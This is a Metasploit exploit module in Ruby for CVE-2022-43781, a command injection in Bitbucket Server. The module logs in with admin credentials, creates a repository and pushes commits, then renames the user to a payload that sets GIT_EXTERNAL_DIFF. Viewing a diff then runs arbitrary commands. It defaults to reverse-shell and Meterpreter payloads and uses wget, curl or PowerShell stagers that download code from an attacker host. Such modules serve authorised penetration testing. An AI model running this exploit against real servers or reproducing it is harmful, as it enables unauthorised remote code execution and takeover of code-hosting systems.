Bitbucket Environment Variable Remote Command Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Git  
include Msf::Exploit::Git::SmartHttp  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Bitbucket Environment Variable RCE',  
'Description' => %q{  
For various versions of Bitbucket, there is an authenticated command injection  
vulnerability that can be exploited by injecting environment  
variables into a user name. This module achieves remote code execution  
as the `atlbitbucket` user by injecting the `GIT_EXTERNAL_DIFF` environment  
variable, a null character as a delimiter, and arbitrary code into a user's  
user name. The value (payload) of the `GIT_EXTERNAL_DIFF` environment variable  
will be run once the Bitbucket application is coerced into generating a diff.  
  
This module requires at least admin credentials, as admins and above  
only have the option to change their user name.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Ry0taK', # Vulnerability Discovery  
'y4er', # PoC and blog post  
'Shelby Pace' # Metasploit Module  
],  
'References' => [  
[ 'URL', 'https://y4er.com/posts/cve-2022-43781-bitbucket-server-rce/'],  
[ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-security-advisory-2022-11-16-1180141667.html'],  
[ 'CVE', '2022-43781']  
],  
'Platform' => [ 'win', 'unix', 'linux' ],  
'Privileged' => true,  
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],  
'Targets' => [  
[  
'Linux Command',  
{  
'Platform' => 'unix',  
'Type' => :unix_cmd,  
'Arch' => [ ARCH_CMD ],  
'Payload' => { 'Space' => 254 },  
'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => 'linux',  
'MaxLineChars' => 254,  
'Type' => :linux_dropper,  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'CmdStagerFlavor' => %i[wget curl],  
'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }  
}  
],  
[  
'Windows Dropper',  
{  
'Platform' => 'win',  
'MaxLineChars' => 254,  
'Type' => :win_dropper,  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'CmdStagerFlavor' => [ :psh_invokewebrequest ],  
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }  
}  
]  
],  
'DisclosureDate' => '2022-11-16',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'Reliability' => [ REPEATABLE_SESSION ],  
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(7990),  
OptString.new('USERNAME', [ true, 'User name to log in with' ]),  
OptString.new('PASSWORD', [ true, 'Password to log in with' ]),  
OptString.new('TARGETURI', [ true, 'The URI of the Bitbucket instance', '/'])  
]  
)  
end  
  
def check  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'login'),  
'keep_cookies' => true  
)  
  
return CheckCode::Unknown('Failed to retrieve a response from the target') unless res  
return CheckCode::Safe('Target does not appear to be Bitbucket') unless res.body.include?('Bitbucket')  
  
nokogiri_data = res.get_html_document  
footer = nokogiri_data&.at('footer')  
return CheckCode::Detected('Failed to retrieve version information from Bitbucket') unless footer  
  
version_info = footer.at('span')&.children&.text  
return CheckCode::Detected('Failed to find version information in footer section') unless version_info  
  
vers_matches = version_info.match(/v(\d+\.\d+\.\d+)/)  
return CheckCode::Detected('Failed to find version info in expected format') unless vers_matches && vers_matches.length > 1  
  
version_str = vers_matches[1]  
  
vprint_status("Found version #{version_str} of Bitbucket")  
major, minor, revision = version_str.split('.')  
rev_num = revision.to_i  
  
case major  
when '7'  
case minor  
when '0', '1', '2', '3', '4', '5'  
return CheckCode::Appears  
when '6'  
return CheckCode::Appears if rev_num >= 0 && rev_num <= 18  
when '7', '8', '9', '10', '11', '12', '13', '14', '15', '16'  
return CheckCode::Appears  
when '17'  
return CheckCode::Appears if rev_num >= 0 && rev_num <= 11  
when '18', '19', '20'  
return CheckCode::Appears  
when '21'  
return CheckCode::Appears if rev_num >= 0 && rev_num <= 5  
end  
when '8'  
print_status('Versions 8.* are vulnerable only if the mesh setting is disabled')  
case minor  
when '0'  
return CheckCode::Appears if rev_num >= 0 && rev_num <= 4  
when '1'  
return CheckCode::Appears if rev_num >= 0 && rev_num <= 4  
when '2'  
return CheckCode::Appears if rev_num >= 0 && rev_num <= 3  
when '3'  
return CheckCode::Appears if rev_num >= 0 && rev_num <= 2  
when '4'  
return CheckCode::Appears if rev_num == 0 || rev_num == 1  
end  
end  
  
CheckCode::Detected  
end  
  
def default_branch  
@default_branch ||= Rex::Text.rand_text_alpha(5..9)  
end  
  
def uname_payload(cmd)  
"#{datastore['USERNAME']}\u0000GIT_EXTERNAL_DIFF=$(#{cmd})"  
end  
  
def log_in(username, password)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'login'),  
'keep_cookies' => true  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('login')  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),  
'keep_cookies' => true,  
'vars_post' => {  
'j_username' => username,  
'j_password' => password,  
'_atl_remember_me' => 'on',  
'submit' => 'Log in'  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'Didn\'t retrieve a response') unless res  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'projects'),  
'keep_cookies' => true  
)  
  
fail_with(Failure::UnexpectedReply, 'No response from the projects page') unless res  
unless res.body.include?('Logged in')  
fail_with(Failure::UnexpectedReply, 'Failed to log in. Please check credentials')  
end  
end  
  
def create_project  
proj_uri = normalize_uri(target_uri.path, 'projects?create')  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => proj_uri,  
'keep_cookies' => true  
)  
  
fail_with(Failure::UnexpectedReply, 'Unable to access project creation page') unless res&.body&.include?('Create project')  
  
vprint_status('Retrieving security token')  
html_doc = res.get_html_document  
token_data = html_doc.at('div//input[@name="atl_token"]')  
fail_with(Failure::UnexpectedReply, 'Failed to find element containing \'atl_token\'') unless token_data  
  
@token = token_data['value']  
fail_with(Failure::UnexpectedReply, 'No token found') if @token.blank?  
  
project_name = Rex::Text.rand_text_alpha(5..9)  
project_key = Rex::Text.rand_text_alpha(5..9).upcase  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => proj_uri,  
'keep_cookies' => true,  
'vars_post' => {  
'name' => project_name,  
'key' => project_key,  
'submit' => 'Create project',  
'atl_token' => @token  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to receive response from project creation') unless res  
fail_with(Failure::UnexpectedReply, 'Failed to create project') unless res['Location']&.include?(project_key)  
  
print_status('Project creation was successful')  
[ project_name, project_key ]  
end  
  
def create_repository  
repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos?create')  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => repo_uri,  
'keep_cookies' => true  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to access repo creation page') unless res  
  
html_doc = res.get_html_document  
  
dropdown_data = html_doc.at('li[@class="user-dropdown"]')  
fail_with(Failure::UnexpectedReply, 'Failed to find dropdown to retrieve email address') if dropdown_data.blank?  
email = dropdown_data&.at('span')&.[]('data-emailaddress')  
fail_with(Failure::UnexpectedReply, 'Failed to retrieve email address from response') if email.blank?  
  
repo_name = Rex::Text.rand_text_alpha(5..9)  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => repo_uri,  
'keep_cookies' => true,  
'vars_post' => {  
'name' => repo_name,  
'defaultBranchId' => default_branch,  
'description' => '',  
'scmId' => 'git',  
'forkable' => 'false',  
'atl_token' => @token,  
'submit' => 'Create repository'  
}  
)  
  
fail_with(Failure::UnexpectedReply, 'No response received from repo creation') unless res  
res = send_request_cgi(  
'method' => 'GET',  
'keep_cookies' => true,  
'uri' => normalize_uri(target_uri.path, 'projects', @project_key, 'repos', repo_name, 'browse')  
)  
  
fail_with(Failure::UnexpectedReply, 'Repository was not created') if res&.code == 404  
print_good("Successfully created repository '#{repo_name}'")  
  
[ email, repo_name ]  
end  
  
def generate_repo_objects(email, repo_file_data = [], parent_object = nil)  
txt_data = Rex::Text.rand_text_alpha(5..20)  
blob_object = GitObject.build_blob_object(txt_data)  
file_name = "#{Rex::Text.rand_text_alpha(4..10)}.txt"  
  
file_data = {  
mode: '100755',  
file_name: file_name,  
sha1: blob_object.sha1  
}  
  
tree_data = (repo_file_data.empty? ? [ file_data ] : [ file_data, repo_file_data ])  
tree_obj = GitObject.build_tree_object(tree_data)  
commit_obj = GitObject.build_commit_object({  
tree_sha1: tree_obj.sha1,  
email: email,  
message: Rex::Text.rand_text_alpha(4..30),  
parent_sha1: (parent_object.nil? ? nil : parent_object.sha1)  
})  
  
{  
objects: [ commit_obj, tree_obj, blob_object ],  
file_data: file_data  
}  
end  
  
# create two files in two separate commits in order  
# to view a diff and get code execution  
def create_commits(email)  
init_objects = generate_repo_objects(email)  
commit_obj = init_objects[:objects].first  
  
refs = {  
'HEAD' => "refs/heads/#{default_branch}",  
"refs/heads/#{default_branch}" => commit_obj.sha1  
}  
  
final_objects = generate_repo_objects(email, init_objects[:file_data], commit_obj)  
repo_objects = final_objects[:objects] + init_objects[:objects]  
new_commit = final_objects[:objects].first  
new_file = final_objects[:file_data][:file_name]  
  
git_uri = normalize_uri(target_uri.path, "scm/#{@project_key}/#{@repo_name}.git")  
res = send_receive_pack_request(  
git_uri,  
refs['HEAD'],  
repo_objects,  
'0' * 40 # no commits should exist yet, so no branch tip in repo yet  
)  
  
fail_with(Failure::UnexpectedReply, 'Failed to push commit to repository') unless res  
fail_with(Failure::UnexpectedReply, 'Git responded with an error') if res.body.include?('error:')  
fail_with(Failure::UnexpectedReply, 'Git push failed') unless res.body.include?('unpack ok')  
  
[ new_commit.sha1, commit_obj.sha1, new_file ]  
end  
  
def get_user_id(curr_uname)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'admin/users/view'),  
'vars_get' => { 'name' => curr_uname }  
)  
  
matched_id = res.get_html_document&.xpath("//script[contains(text(), '\"name\":\"#{curr_uname}\"')]")&.first&.text&.match(/"id":(\d+)/)  
fail_with(Failure::UnexpectedReply, 'No matches found for id of user') unless matched_id && matched_id.length > 1  
  
matched_id[1]  
end  
  
def change_username(curr_uname, new_uname)  
@user_id ||= get_user_id(curr_uname)  
  
headers = {  
'X-Requested-With' => 'XMLHttpRequest',  
'X-AUSERID' => @user_id,  
'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}"  
}  
  
vars = {  
'name' => curr_uname,  
'newName' => new_uname  
}.to_json  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'rest/api/latest/admin/users/rename'),  
'ctype' => 'application/json',  
'keep_cookies' => true,  
'headers' => headers,  
'data' => vars  
)  
  
unless res  
print_bad('Did not receive a response to the user name change request')  
return false  
end  
  
unless res.body.include?(new_uname) || res.body.include?('GIT_EXTERNAL_DIFF')  
print_bad('User name change was unsuccessful')  
return false  
end  
  
true  
end  
  
def commit_uri(project_key, repo_name, commit_sha)  
normalize_uri(  
target_uri.path,  
'rest/api/latest/projects',  
project_key,  
'repos',  
repo_name,  
'commits',  
commit_sha  
)  
end  
  
def view_commit_diff(latest_commit_sha, first_commit_sha, diff_file)  
commit_diff_uri = normalize_uri(  
commit_uri(@project_key, @repo_name, latest_commit_sha),  
'diff',  
diff_file  
)  
  
send_request_cgi(  
'method' => 'GET',  
'uri' => commit_diff_uri,  
'keep_cookies' => true,  
'vars_get' => { 'since' => first_commit_sha }  
)  
end  
  
def delete_repository(username)  
vprint_status("Attempting to delete repository '#{@repo_name}'")  
repo_uri = normalize_uri(target_uri.path, 'projects', @project_key, 'repos', @repo_name.downcase)  
res = send_request_cgi(  
'method' => 'DELETE',  
'uri' => repo_uri,  
'keep_cookies' => true,  
'headers' => {  
'X-AUSERNAME' => username,  
'X-AUSERID' => @user_id,  
'X-Requested-With' => 'XMLHttpRequest',  
'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",  
'ctype' => 'application/json',  
'Accept' => 'application/json, text/javascript'  
}  
)  
  
unless res&.body&.include?('scheduled for deletion')  
print_warning('Failed to delete repository')  
return  
end  
  
print_good('Repository has been deleted')  
end  
  
def delete_project(username)  
vprint_status("Now attempting to delete project '#{@project_name}'")  
send_request_cgi( # fails to return a response  
'method' => 'DELETE',  
'uri' => normalize_uri(target_uri.path, 'projects', @project_key),  
'keep_cookies' => true,  
'headers' => {  
'X-AUSERNAME' => username,  
'X-AUSERID' => @user_id,  
'X-Requested-With' => 'XMLHttpRequest',  
'Origin' => "#{ssl ? 'https' : 'http'}://#{peer}",  
'Referer' => "#{ssl ? 'https' : 'http'}://#{peer}/projects/#{@project_key}/settings",  
'ctype' => 'application/json',  
'Accept' => 'application/json, text/javascript, */*; q=0.01',  
'Accept-Encoding' => 'gzip, deflate'  
}  
)  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'projects', @project_key),  
'keep_cookies' => true  
)  
  
unless res&.code == 404  
print_warning('Failed to delete project')  
return  
end  
  
print_good('Project has been deleted')  
end  
  
def get_repo  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),  
'keep_cookies' => true  
)  
  
unless res  
print_status('Couldn\'t access repos page. Will create repo')  
return []  
end  
  
json_data = JSON.parse(res.body)  
unless json_data && json_data['size'] >= 1  
print_status('No accessible repositories. Will attempt to create a repo')  
return []  
end  
  
repo_data = json_data['values'].first  
repo_name = repo_data['slug']  
project_key = repo_data['project']['key']  
  
unless repo_name && project_key  
print_status('Could not find repo name and key. Creating repo')  
return []  
end  
  
[ repo_name, project_key ]  
end  
  
def get_repo_info  
unless @project_name && @project_key  
print_status('Failed to find valid project information. Will attempt to create repo')  
return nil  
end  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri('projects', @project_key, 'repos', @project_name, 'commits'),  
'keep_cookies' => true  
)  
  
unless res  
print_status("Failed to access existing repository #{@project_name}")  
return nil  
end  
  
html_doc = res.get_html_document  
commit_data = html_doc.search('a[@class="commitid"]')  
unless commit_data && commit_data.length > 1  
print_status('No commits found for existing repo')  
return nil  
end  
  
latest_commit = commit_data[0]['data-commitid']  
prev_commit = commit_data[1]['data-commitid']  
  
file_uri = normalize_uri(commit_uri(@project_key, @project_name, latest_commit), 'changes')  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => file_uri,  
'keep_cookies' => true  
)  
  
return nil unless res  
  
json = JSON.parse(res.body)  
return nil unless json['values']  
  
path = json['values']&.first&.dig('path')  
return nil unless path  
  
[ latest_commit, prev_commit, path['name'] ]  
end  
  
def exploit  
@use_public_repo = true  
datastore['GIT_USERNAME'] = datastore['USERNAME']  
datastore['GIT_PASSWORD'] = datastore['PASSWORD']  
  
if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?  
fail_with(Failure::BadConfig, 'No credentials to log in with.')  
end  
  
log_in(datastore['USERNAME'], datastore['PASSWORD'])  
@curr_uname = datastore['USERNAME']  
  
@project_name, @project_key = get_repo  
@repo_name = @project_name  
@latest_commit, @first_commit, @diff_file = get_repo_info  
unless @latest_commit && @first_commit && @diff_file  
@use_public_repo = false  
@project_name, @project_key = create_project  
email, @repo_name = create_repository  
@latest_commit, @first_commit, @diff_file = create_commits(email)  
print_good("Commits added: #{@first_commit}, #{@latest_commit}")  
end  
  
print_status('Sending payload')  
case target['Type']  
when :win_dropper  
execute_cmdstager(linemax: target['MaxLineChars'] - uname_payload('cmd.exe /c ').length, noconcat: true, temp: '.')  
when :linux_dropper  
execute_cmdstager(linemax: target['MaxLineChars'], noconcat: true)  
when :unix_cmd  
execute_command(payload.encoded.strip)  
end  
end  
  
def cleanup  
if @curr_uname != datastore['USERNAME']  
print_status("Changing user name back to '#{datastore['USERNAME']}'")  
  
if change_username(@curr_uname, datastore['USERNAME'])  
@curr_uname = datastore['USERNAME']  
else  
print_warning('User name is still set to payload.' \  
"Please manually change the user name back to #{datastore['USERNAME']}")  
end  
end  
  
unless @use_public_repo  
delete_repository(@curr_uname) if @repo_name  
delete_project(@curr_uname) if @project_name  
end  
end  
  
def execute_command(cmd, _opts = {})  
if target['Platform'] == 'win'  
curr_payload = (cmd.ends_with?('.exe') ? uname_payload("cmd.exe /c #{cmd}") : uname_payload(cmd))  
else  
curr_payload = uname_payload(cmd)  
end  
  
unless change_username(@curr_uname, curr_payload)  
fail_with(Failure::UnexpectedReply, 'Failed to change user name to payload')  
end  
  
view_commit_diff(@latest_commit, @first_commit, @diff_file)  
@curr_uname = curr_payload  
end  
end  
`